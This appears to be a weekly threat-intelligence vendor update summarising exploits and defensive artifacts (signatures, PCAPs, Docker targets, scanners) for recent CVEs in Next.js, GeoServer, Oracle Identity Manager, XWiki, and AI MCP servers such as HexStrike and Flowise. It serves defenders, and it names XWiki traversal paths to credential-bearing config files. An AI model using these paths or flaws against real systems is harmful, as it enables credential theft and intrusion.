Happy Friday! If you're handling remediation or incident response efforts for this week's React Server Components and Next.js vulnerability, you have our sympathy, along with a slew of detections, queries, and exploit artifacts to aid in testing and defense. The following are the Initial Access Intelligence team's deliverables for the past week. Buckle up!
CVE-2025-55182 is a CVSS 10 vulnerability in React Server Components (RSC) and Next.js that was disclosed on December 3, 2025. It is remotely exploitable in default Next.js applications and has driven broad emergency patching and incident response action amid exploitation attempts. The VulnCheck team has produced exploits that deliver an encrypted reverse shell, generic command execution, an in-memory webshell, and an in-memory reverse shell. No target-specific information is necessary for successful exploitation.
The team also delivered ASM queries, a vulnerability check, PCAPs, a test Docker image, and Snort and Suricata rules, all of which were released progressively throughout the week. VulnCheck Canary Intelligence has detected exploitative (malicious) scanning as of December 5. Our preliminary internet scans indicate a high vulnerable target population. For the latest information and the team's research observations, including RCE attack path analysis, see our emerging threat blog.
The team developed an exploit for GeoServer, a popular open-source server for sharing and editing geospatial data. The server's WMS GetMap endpoint fails to disable external entity expansion when parsing SLD/XML requests, allowing the XML parser to read local filesystem paths or make web requests from the server. As of December 5, VulnCheck's canary network has detected exploitation of this vulnerability, which has been added to VulnCheck KEV. Our FOFA query shows over 11,000 instances online. The team delivered an exploit, PCAPs, network signatures, a Docker target, version scanners, and ASM queries.
Hot on the heels of last week's ASM and query coverage for Oracle Identity Manager CVE-2025-61757, the team added an exploit, PCAP, and network signature updates. Customers now have access to the exploit, two PCAPs, improved network signatures, and ASM queries for this exploited-in-the-wild Oracle vulnerability.
More XWiki content! Today we added coverage for XWiki CVE-2025-55748, a parameter-based path traversal that allows an unauthenticated attacker to disclose the contents of any file under the application root. Notably, the files ../../WEB-INF/xwiki.cfg and ../../WEB-INF/hibernate.cfg.xml contain credentials to the application (if set) and database connection.
We have added an exploit, version scanner, PCAP, network signatures, a Docker target, and ASM queries in this release. FOFA reports several thousand XWiki deployments online. CrowdSec has been tracking exploitation in the wild since October 29, 2025.
The team developed an exploit for HexStrike AI MCP Server, which provides AI MCP access to vulnerability testing tooling. This application did not provide authentication and further did not validate functionally any tooling parameters passed, allowing many paths to unauthenticated remote code execution. At the time of writing the project has not been updated and remains vulnerable. It is has more than 4,900 GitHub stars and appears to have a fairly active issues page. The team has provided an exploit, network signatures, version scanners, PCAPs, and a Docker target.
Another day, another Flowise exploit! This week the team targeted Flowise Custom MCP functionality in versions ≤ 3.0.0 that did not validate requests to create new MCP tools, allowing an unauthenticated attacker to create tools containing malicious commands that allowed for remote code execution. This exploit was observed in VulnCheck canary data and was added to VulnCheck KEV on November 27. The team delivered an exploit, PCAPs, network signatures, a Docker target, version scanners, and ASM queries.